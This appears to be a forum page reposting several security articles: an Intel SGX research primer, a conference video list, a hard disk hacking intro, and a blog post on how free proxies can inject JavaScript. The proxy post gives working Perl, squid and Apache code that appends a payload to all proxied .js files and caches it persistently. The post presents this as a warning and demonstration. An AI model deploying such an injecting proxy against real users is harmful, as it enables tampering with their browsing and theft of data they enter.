In the Intel SGX model we have one CPU which can host many secure enclaves (islands): Source: Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002) – Page 13 Intel SGX is like the Protected Processes Microsoft introduced in Windows Vista, but with the added benefit that it is hardware-enforced, so that even the underlying OS kernel can't tamper or snoop. Intel® and Third Party High-Level and Low-Level Background Material Intel provides background on the design goals of SGX in a series of three (currently) blog posts: Intel® SGX for Dummies (Intel® SGX Design Objectives): September 2013, Matthew Hoekstra Intel® SGX for Dummies – Part 2: June 2014, Matthew Hoekstra Intel® SGX for Dummies – Part 3: September 2014, Matthew Hoekstra Several other useful resources from Intel on how SGX actually works come in the guise of: Innovative Instructions and Software Model for Isolated Execution: June 2013, Frank McKeen, Ilya Alexandrovich, Alex Berenzon, Carlos Rozas, Hisham Shafi, Vedvyas Shanbhogue and Uday Savagaonkar, Intel Corporation Intel® Software Guard Extensions (Intel® SGX) Instructions and Programming Model: June 2013, Frank McKeen, Ilya Alexandrovich, Alex Berenzon, Carlos Rozas, Vedvyas Shanbhogue and Uday Savagaonkar, Intel Corporation Intel® Software Guard Extensions (Intel® SGX): November 2013, Carlos Rozas, Intel Labs (given at CMU) Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002): October 2014 Intel® Software Guard Extensions Programming Reference Rev 1 (#329298-001) was published in September 2013 From the Microsoft Haven research (see later) we know that revision 2 of the SGX specifications resolved issues with: Exception handling: page faults and general protection faults were not reported in the enclave. Permitted instructions: CPUID, RDTSC and IRET were not permitted previously. Of these, RDTSC and IRET now are. Thread-local storage: there were problems due to segment register usage, which have been fixed.
Finally, a good third-party presentation on Intel SGX comes from the Technische Universität Darmstadt, Germany, in a lecture on embedded system security titled Trusted Execution Environments Intel SGX. It provides a good summary of the functionality and how key operations occur, saving you from wading through the programming manual. Previous Security Analysis While no CPUs with SGX are available, nor any emulators/simulators (publicly at least – see later in this post), others have passed initial comment on the potential security ramifications of SGX in both good and evil contexts over the past 18 months. Intel Software Guard Extensions (SGX) Is Mighty Interesting: July 2013, Rich Mogull – Discusses the positive applications against malware, hypervisors and the potential to replace HSMs. Thoughts on Intel's upcoming Software Guard Extensions (Part 1): August 2013, Joanna Rutkowska – Initial high-level thoughts on the functionality provided and how it complements existing Intel technologies. Thoughts on Intel's upcoming Software Guard Extensions (Part 2): September 2013, Joanna Rutkowska – Lower-level thoughts on good and bad applications for SGX. SGX: the good, the bad and the downright ugly: January 2014, Shaun Davenport & Richard Ford Application of SGX in the Real World So how far has the application of SGX in the real world come? As already mentioned, given the lack of CPU support, the ability to experiment with the technology has been limited to the few. Two examples of groups who have been afforded access are Microsoft Research and the United States Air Force Academy. The application of SGX by these two groups is radically different: Microsoft have focused on server-side applications, whilst the Air Force Academy seem to be focusing on client-side use cases.
Secure Enclaves-Enabled Technologies: Browser Extension According to a 2014 National Security Innovation Competition Proceedings Report on Secure Enclaves-Enabled Technologies from the United States Air Force Academy, there is at least one company who has access to the technology and has funding: Secure Enclaves-Enabled Technologies is a digital security firm to be launched in the coming year. It is born from a unique relationship between Intel Labs and the Department of Homeland Security seeking to develop a revolutionary solution to cyber security problems Then they reveal their intended application of SGX: SE Enabled Technologies seeks to exploit the capabilities of SGX through the creation of software solutions. Currently, we are seeking to compliment Intel’s hardware solution through the use of a browser extension application. Using the browser extension, we can offer a wide array of security solutions from secure storage and transmission of documents to secure video streaming. As of April 12, 2014 according to the Colorado Springs Undergraduate Research Forum proceedings things had moved on: In today’s increasingly digital world, more and more sensitive information is stored electronically, and more and more often this information comes under attack. With the continual evolution of offensive attack techniques, the need for more impressive defensive counter-measures is becoming apparent. As the requisite to fill this capability gap grows, so does the opportunity for businesses. Replacing the need for a countermeasure, recent developments in micro-processer technology have created a veritable impenetrable fortress to be placed inside modern day computer systems. The answer lies in Secure Enclaves - Enabled Technology, a software company that utilizes Intel Labs’ revolutionary Software Guard Extensions technology. Instead of relying on encryption and software, this technology is hardware-based, and is so secure that an NSA Red Team could not crack it. 
This technology has tremendous application to both government and private organizations concerned about security. For completing a proof of concept case with the Department of Veterans’ Affairs, Secure Enclaves – Enabled Technologies will receive $500,000 that it will channel into the development of a commercially available security software package. Further details around Secure Enclaves-Enabled Technologies can be found in the 2014 National Security Innovation Competition proceedings (page 57 onwards) including these points of interest: SGX will be a standard component of Intel’s chipsets beginning in 2015. However, new software must be developed or current software must be adapted in order to have the ability to utilize the new set of instructions provided by the chipset. Without this critical software development, the cyber security solution afforded by SGX will lie dormant. Microsoft: VC3 VC3 was published in October 2014 in the paper titled VC3: Trustworthy Data Analytics in the Cloud, for which the abstract states: We present VC3, the first practical framework that allows users to run distributed MapReduce computations in the cloud while keeping their code and data secret, and ensuring the correctness and completeness of their results. VC3 runs on unmodified Hadoop, but crucially keeps Hadoop, the operating system and the hypervisor out of the TCB; thus, confidentiality and integrity are preserved even if these large components are compromised. VC3 relies on SGX processors to isolate memory regions on individual computers, and to deploy new protocols that secure distributed MapReduce computations. 
VC3 optionally enforces region self-integrity invariants for all MapReduce code running within isolated regions, to prevent attacks due to unsafe memory reads and writes An interesting aspect of the Microsoft VC3 work is the adversary model they considered: We consider a powerful adversary who may control the entire software stack in a cloud provider’s infrastructure, including hypervisor and OS. The adversary may also record, replay, and modify network packets. The adversary may also read or modify data after it left the processor using probing, DMA, or similar techniques. Our adversary may in particular access any number of other jobs running on the cloud, thereby accounting for coalitions of users and data center nodes. Further, we assume that the adversary is unable to physically open and manipulate at least those SGX-enabled processor packages that reside in the cloud provider’s data centers. Microsoft: Haven Haven was presented at USENIX in October 2014 in a paper titled Shielding applications from an untrusted cloud with Haven (Slides etc. are available from USENIX.), for which the abstract states: Our prototype, Haven, is the first system to achieve shielded execution of unmodified legacy applications, including SQL Server and Apache, on a commodity OS (Windows) and commodity hardware. Haven leverages the hardware protection of Intel SGX to defend against privileged code and physical attacks such as memory probes, but also addresses the dual challenges of executing unmodified legacy binaries and protecting them from a malicious host. This work motivated recent changes in the SGX specification. 
Further Applications Two other papers related to how SGX can be applied are (both from Intel): Using Innovative Instructions to Create Trustworthy Software Solutions Innovative Technology for CPU Based Attestation and Sealing Finally, there was some speculation that Ubuntu's LXD, announced in early November 2014, might use SGX. Ubuntu do state that: We're working with silicon companies to ensure hardware-assisted security and isolation for these containers, just like virtual machines today. Emulator and CPU Support Status By now you will no doubt be salivating at the prospect of SGX and want to prototype: New, first-of-its-kind malware which uses SGX in preparation for BlackHat USA 2015 OR A Soft-HSM OR DRM extensions which use SGX So what is the status of emulator and CPU support for SGX? Emulators Alas, no emulators are available to the public, although one does exist inside Intel and is shared with select partners. In June 2014 Intel said in the comments section of the Intel® SGX for Dummies (Intel® SGX Design Objectives) blog post: Intel is not ready to announce plans for availability of SGX emulation platform yet, but this forum will be updated when we are ready. So how did Microsoft develop their VC3 and Haven prototypes? In the Microsoft VC3 paper from February 2014 Microsoft said: We successfully tested our implementation in an SGX emulator provided by Intel More interestingly, they then go on to say: However, since that emulator is not performance accurate, we have implemented our own software emulator for SGX. Our goal was to use SGX as specified in [31] as a concrete basis for our VC3 implementation and to obtain realistic estimates for how SGX would impact the performance of VC3. Our software emulator does not attempt to provide security guarantees. The emulator is implemented as a Windows driver. It hooks the KiDebugRoutine function pointer in the Windows kernel that is invoked on every exception received by the kernel.
Execution of an SGX opcode from [31] will generate an illegal instruction exception on existing processors, upon which the kernel will invoke our emulator via a call to KiDebugRoutine. The emulator contains handler functions for all SGX instructions used by VC3, including EENTER, EEXIT, EGETKEY, EREPORT, ECREATE, EADD, EEXTEND, and EINIT. We use the same mechanism to handle accesses to model specific registers (MSR) and control registers as specified in [31]. We also modified the SwapContext function in the Windows kernel to ensure that the full register context is loaded correctly during enclave execution. In the Haven research from October 2014, Microsoft said: We developed Haven on an instruction-accurate SGX emulator provided by Intel, but evaluate it using our own model of SGX performance. Haven goes beyond the original design intent of SGX, so while the hardware was mostly sufficient, it did have three fundamental limitations for which we proposed fixes (§5.4). These are incorporated in a revised version of the SGX specification, published concurrently by Intel. Note: The revised version they refer to is Rev 2 of the Intel® Software Guard Extensions Programming Reference. Aside from this, there was a project at Georgia Institute of Technology to add Intel SGX emulation using QEMU, which they appear to have achieved between their plan presentation on October 20, 2014 and their summary presentation on December 1, 2014. However, a quick search of the QEMU history finds no trace of their commits. CPU Support Currently there is no CPU on the market which supports the SGX or SGX2 instruction set. Future Security Research So, first off, from reading the programming reference some initial questions would be: Do the 'SGX Enclave Control Structures' (SECS) have their integrity ensured? The SECSs contain meta-data used by the CPU to protect the enclave and will thus be a prime target. Do the 'Thread Control Structures' (TCS) have their integrity ensured?
The TCSs contain meta-data used by the hardware to save and restore thread-specific information when entering/exiting the enclave. Does the 'Enclave Page Cache Map' (EPCM) have its integrity ensured? The EPCM is used to keep track of which bits of memory are in the 'Enclave Page Cache' (EPC) and is 'managed by the processor'. The reasons for the above questions are in part driven by the obvious, but also by the fact that Intel mention they stop certain concurrent operations to protect the integrity of these structures. Also, it is important to differentiate between the integrity provided by the Memory Encryption Engine (MEE – more on this later, as it provides protection against external memory modification) and that afforded by the microcode operating on these structures. In the presentation Dynamic Root of Trust and Trusted Execution we see that the MEE does provide integrity protection from external modification: Some other questions which spring to mind include: What are the algorithm and key-generation mechanism for the 'Enclave Page Cache' (EPC)? The EPC is the RAM used by the secure enclaves. Where it resides in RAM it is protected by an encryption engine. The whole debug problem. If you compromise or own the underlying OS before attestation of the enclave has occurred, then there is the obvious bootstrap problem, which the Trusted Computing Base (TCB) is designed to help with. This is also where remote attestation (as discussed by Joanna Rutkowska) will become critical, to detect whether an aggressor has pre-owned the environment, allowing them to catch the provisioning process within the supposed secure enclave. Source: Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002) – Page 177 Aside from the topics mentioned, it is clear that any microcode vulnerability or errata that allows subversion of an enclave would be extremely valuable.
For example, the diagram below shows Processor Reserved Memory (PRM), which is used to house some of the structures mentioned in the question section. Source: Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002) – Page 40 How is the integrity of memory ensured in the EPC implementation? Looking at the related patent Parallelized counter tree walk for low overhead memory replay protection: As the lower-level counters (including L2, L1 and L0 counters and the version nodes 260) are off the processor die and therefore are susceptible to attacks, each counter and each version node are encoded with an embedded Message Authentication Code (MAC) (shown as the blocks with hatched lines) to ensure their integrity. In one embodiment, each embedded MAC is computed over the line in which they are embedded, using a corresponding counter from the next higher level as input. In the example of Figure 2, the embedded MAC for the version block 250 associated with L03 (shown in Figure 2 as the middle version block) is computed using the values of V0 – Vp and its corresponding L0 counter (L03). The value of this embedded MAC is stored striped in the line of the version blocks 250 (shown as striped boxes in Figure 2). The embedded MAC for each line of L0, L1 and L2 is computed similarly. L3 counters do not need embedded MACs because the contents of L3 counters are within the trusted boundary 205. Finally, from a defensive standpoint the impact on memory forensics and similar techniques is likely going to be substantial. Understanding the finer details will become critical. Conclusions Intel SGX is an interesting technology for numerous parties, both good and bad, outside of DRM. However, it is also clear that there is enough small print that the implementations across all families of CPU will warrant investigation when they become generally available.
From a vulnerability/attack research perspective, vulnerabilities in enclave-protected code (including brokers) as well as in CPU microcode will become incredibly valuable, as will any attestation aspects. There will likely be renewed focus on understanding the exploitability of issues noted in Intel CPU errata to potentially subvert or otherwise influence control of an enclave. From a defensive standpoint, cloud and sensitive compartmentalised client-side operations become feasible without reliance on the security of underlying hypervisors or the performance/usability trade-offs of homomorphic encryption. Finally, imagine a world where LSASS on Microsoft Windows runs in an SGX enclave, so that even certain attacks implemented by Mimikatz are no longer possible. Sursa: https://www.nccgroup.com/en/blog/2015/01/intel-software-guard-extensions-sgx-a-researchers-primer/#
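As an appendix to the counter-tree MAC scheme quoted from the patent: each off-die line of counters carries a MAC computed over the line plus the corresponding counter from the next level up, so modifying or replaying a lower level no longer verifies against the trusted level above it. A hedged Python sketch of that idea (the key, MAC algorithm, and line sizes here are simplifying assumptions, not the real Memory Encryption Engine design):

```python
import hmac, hashlib

KEY = b"illustrative-key"  # the real engine derives its keys in hardware

def mac_line(line_counters, parent_counter):
    """MAC over one line of counters, bound to the next-higher-level counter."""
    data = b"".join(c.to_bytes(8, "little") for c in line_counters)
    data += parent_counter.to_bytes(8, "little")
    return hmac.new(KEY, data, hashlib.sha256).digest()

def verify(line_counters, parent_counter, mac):
    """Check a stored line MAC against the (trusted) parent counter."""
    return hmac.compare_digest(mac_line(line_counters, parent_counter), mac)

# One line of version counters, protected by its parent counter one level up.
versions = [3, 1, 4, 1, 5]
parent = 7
stored_mac = mac_line(versions, parent)

print(verify(versions, parent, stored_mac))        # intact line -> True
print(verify([9, 1, 4, 1, 5], parent, stored_mac)) # tampered line -> False
print(verify(versions, 6, stored_mac))             # replayed parent -> False
```

Because the top-level counters live inside the trusted boundary, a verification failure anywhere along the walk reveals off-die tampering or replay.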
23. Why are free proxies free? Because it's an easy way to infect thousands of users and collect their data Posted by Christian Haschek on 29.05.13 © Anonymous wallpaper I recently stumbled across a talk by Chema Alonso from the Defcon 20 conference where he was talking about how he created a Javascript botnet from scratch and how he used it to find scammers and hackers. Everything is done via a stock SQUID proxy with small config changes. The idea is pretty simple: [server] Install Squid on a linux server [Payload] Modify the server so all transmitted javascript files will get one extra piece of code that does things like send all data entered in forms to your server [Cache] Set the caching time of the modified .js files as high as possible https This technique also works with https if the site loads unsafe resources (e.g. jQuery from an http site). Most browsers will tell you that, and some might even block the content, but usually nobody pays attention to the "lock" symbol. To put it simply: Safe: Unsafe: In the presentation Chema said he posted the IP of the modified server on the web, and after a few days there were over 5000 people using his proxy. Most people used it for bad things, because everyone knows you're only anonymous on the web when you've got a proxy, and it looks like many people don't think that the proxy could do something bad to them. I was wondering if it really is that simple, so I took a VM running Debian and tried implementing the concept myself. Make your own js infecting proxy I assume that you have a squid proxy running, and you'll also need a webserver like Apache using /var/www as web root directory (which is the default). Step 1: Create a payload For the payload I'll use a simple script that takes all links of a webpage and rewrites their href (link) attributes to point to my site.
/etc/squid/payload.js

for(var i=0;i<document.getElementsByTagName('a').length;i++)
    document.getElementsByTagName('a')[i].href = "https://blog.haschek.at";

Step 2: Write the script that poisons all requested .js files

/etc/squid/poison.pl

#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while(<>) {
    chomp $_;
    if($_ =~ /(.*\.js)/i) {
        $url = $1;
        system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
        system("chmod o+r /var/www/tmp/$pid-$count.js");
        system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
        print "http://127.0.0.1:80/tmp/$pid-$count.js\n";
    } else {
        print "$_\n";
    }
    $count++;
}

This script uses wget to retrieve the original javascript file the client asked for and adds the code from the /etc/squid/payload.js file to it. This modified file (which now contains our payload) will be sent to the client. You'll also have to create the folder /var/www/tmp and allow squid to write files in it. This folder is where all modified js scripts will be stored. Step 3: Tell Squid to use the script above In /etc/squid/squid.conf add url_rewrite_program /etc/squid/poison.pl Step 4: Never let the cache expire /var/www/tmp/.htaccess ExpiresActive On ExpiresDefault "access plus 3000 days" These lines tell the apache server to give the file an insanely long expiration (caching) time, so it will stay in the user's browser until they clear their cache. One more restart of squid and you're good to go. If you connect to the proxy and browse to any webpage, the page will be displayed as expected but all links will lead to this blog. The sneaky thing about this technique is that even when somebody disconnects from the proxy, the cached js files will most likely still be in their caches. In my example the payload does nothing too destructive and the user will notice pretty fast that something is fishy, but with creative payloads all sorts of things could be implemented.
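For reference, squid's url_rewrite_program protocol is just URLs read on stdin, one per line, with the (possibly rewritten) URL echoed back on stdout. Here's a hedged Python sketch of the same rewrite decision the Perl helper makes; the cache path and local URL are the same assumptions as above, and the fetch-and-append step is only noted in a comment:

```python
import re

LOCAL_BASE = "http://127.0.0.1:80/tmp"  # served by the local Apache

def rewrite(url, pid, count):
    """Map .js URLs to a poisoned local copy; pass everything else through."""
    if re.search(r"\.js$", url, re.IGNORECASE):
        # The real helper fetches the original file here (wget) and appends
        # payload.js to it before handing squid this local URL instead.
        return "%s/%d-%d.js" % (LOCAL_BASE, pid, count)
    return url

print(rewrite("http://example.com/jquery.js", 1234, 0))
# -> http://127.0.0.1:80/tmp/1234-0.js
print(rewrite("http://example.com/index.html", 1234, 1))
# -> http://example.com/index.html
```

In a real helper this function would run in a loop over sys.stdin with unbuffered output, exactly like the `while(<>)` loop in the Perl version.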
Tell your friends never to use free proxies because many hosts do things like that. Be safe on the web (but not with free proxies) Sursa: https://blog.haschek.at/post/fd9bc
  24. Video archives of security conferences Just some links for your enjoyment List of security conferences in 2014 Video archives: Blackhat 2012 Botconf 2013 Bsides Bsides Cleveland 2012 BsidesCLE Chaos Communication Congress Chaos Communications Channel YouTube 31c3 Recordings Defcon Defcon: All Conference CDs and DVDs with Presentation PDF files (updated 2014 for DEF CON 22): Torrent Defcon: all other Derbycon Digital Bond's S4x14 Digital Bond's S4x14 ISC Security Circle City Con GrrCON Information Security Summit & Hacker Conference Hack in the box HITB 2011 InfowarCon InfowarCon 2014 Free and Open Source Software Conference 2014 froscon2014 International Cyber Security Conference KIACS Cyber Security Conference KIACS 2014 Louisville NATO Cyber Security Conference Notacon Notacon 2013 Nullcon Nullcon 2014 Nullcon 2013 Nullcon 2012 OWASP AppSec EU Research 2013 AppSecUSA 2012 AppSecUSA 2011 RSA Videos Ruxcon Shmoocon Shmoocon 2014 Troopers OISF OHM OHM2013. Observe, Hack, Make Special thanks to Adrian Crenshaw for his collection of videos Posted by Mila Sursa: contagio: Video archives of security conferences
25. Hard disk hacking - Intro Intro Apart from this article, I also gave a talk at OHM2013 about this subject. The video of that talk (minus the first few minutes) is now online. Hard disks: if you read this, it's pretty much certain you use one or more of the things. They're pretty simple: they basically present a bunch of 512-byte sectors, numbered by an increasing address, also known as the LBA or Logical Block Address. The PC the HD is connected to can read or write data to and from these sectors. Usually, a file system is used that abstracts all those sectors to files and folders. If you look at an HD from that naive standpoint, you would think the hardware should be pretty simple: all you need is something that connects to a SATA-port which can then position the read/write-head and read or write data from or to the platters. But maybe more is involved: don't hard disks also handle bad block management and SMART attributes, and don't they usually have some cache they must somehow manage? All that implies there's some intelligence in a hard disk, and intelligence usually implies hackability. I'm always interested in hackability, so I decided I wanted to look into how hard disks work on the non-mechanical level. Research like this has been done before for various bits of hardware: from PCI extension cards to embedded controllers in laptops to even Apple keyboards. Usually the research has been done in order to prove that the hackability of these devices can lead to compromised software, so I decided to take the same approach: for this hack, I wanted to make a hard disk that could bypass software security. Full article: Sprites mods - Hard disk hacking - Intro